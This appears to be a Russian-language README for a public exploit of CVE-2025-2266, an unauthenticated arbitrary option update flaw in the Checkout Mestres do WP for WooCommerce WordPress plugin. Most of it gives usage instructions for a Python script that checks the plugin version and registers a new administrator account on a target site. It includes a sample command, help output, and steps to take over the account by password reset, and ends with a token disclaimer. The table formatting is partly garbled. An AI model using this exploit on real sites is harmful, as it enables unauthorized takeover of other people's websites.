
Checkout Mestres do WP for WooCommerce 8.6.5 - 8.7.5 - Неаутентифицированное произвольное обновление опций
Плагин Checkout Mestres do WP for WooCommerce для WordPress подвержен уязвимости неаутентифицированного обновления произвольных параметров в версиях с 8.6.5 по 8.7.5.
Уязвимая функция cwmpUpdateOptions() не содержит надлежащих проверок прав доступа, что позволяет неаутентифицированным злоумышленникам обновлять произвольные параметры WordPress.
Злоумышленник может:
administratorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HЭтот Python-скрипт эксплуатирует уязвимость, чтобы:
administrator ролью по умолчаниюrequests (установка через pip install requests)8.6.5 – 8.7.5)Скрипт проверяет версию плагина через:
/wp-content/plugins/checkout-mestres-wp/readme.txt
Если плагин уязвим:
Регистрирует нового пользователя (по умолчанию: nxploited) с правами администратора
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| Параметр | Описание |
|---|---|
-u, |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
После создания пользователя:
Перейдите на страницу входа:
http://target.com/wordpress/wp-login.php
Нажмите «Забыли пароль?»
[email protected])Установите пароль и получите полный доступ администратора 🎯
Эксплойт от Nxploited | Khaled Alenazi
⚠️ Этот скрипт предназначен только для образовательных целей и авторизованного тестирования.
--url| URL целевого сайта WordPress (обязательно) |
-newuser | Создать нового администратора (имя по умолчанию: nxploited) |
-email | Электронная почта для нового пользователя (по умолчанию: [email protected]) |